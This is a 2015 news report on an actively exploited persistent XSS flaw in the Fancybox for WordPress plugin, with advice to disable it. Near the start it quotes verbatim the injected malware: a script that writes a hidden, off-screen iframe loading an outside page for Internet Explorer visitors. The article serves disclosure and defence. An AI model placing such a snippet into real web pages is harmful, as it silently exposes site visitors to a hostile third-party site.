Four hours ago, users seeking support on WordPress.org reported malware injected into their sites from an unknown source. The vulnerability allows for an iframe to be injected, redirecting to a “203koko” site.

<script>/*<![CDATA[*/if(navigator.userAgent.match(/msie/i)){document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>');}/*]]>*/</script>

After working together to determine the plugins they have in common, users identified Fancybox for WordPress as the culprit. It has since been temporarily removed from the WordPress Plugins Directory, as it hasn’t been updated for two years and poses a security threat to users. The plugin has received more than half a million downloads and is likely in use on thousands of WordPress sites.

Konstantin Kovshenin and Gennady Kovshenin worked together to analyze sites from affected users to confirm the vulnerability. There is currently no patch, so users of the plugin are advised to turn it off immediately.

If you are running Fancybox for #WordPress turn it off now! It contains a persistent XSS #vulnerability #security #infosec — Gennady Kovshenin (@soulseekah) February 4, 2015

Analysts at Sucuri have confirmed via Website Firewall logs that the vulnerability is being actively exploited:

After some analysis, we can confirm that this plugin has a serious vulnerability that allows for malware (or any random script/content) to be added to the vulnerable site. Because it is currently unpatched, we will not disclose more information. What makes things worse, is that it’s being actively exploited in the wild, leading to many compromised websites.

Users who have this plugin installed on their sites have no other option than to disable it, as no patch is available yet. The plugin’s author, José Pardilla, is aware of the issue and responded to an affected user five hours ago in the plugin’s forum on WordPress.org. A patch should be forthcoming.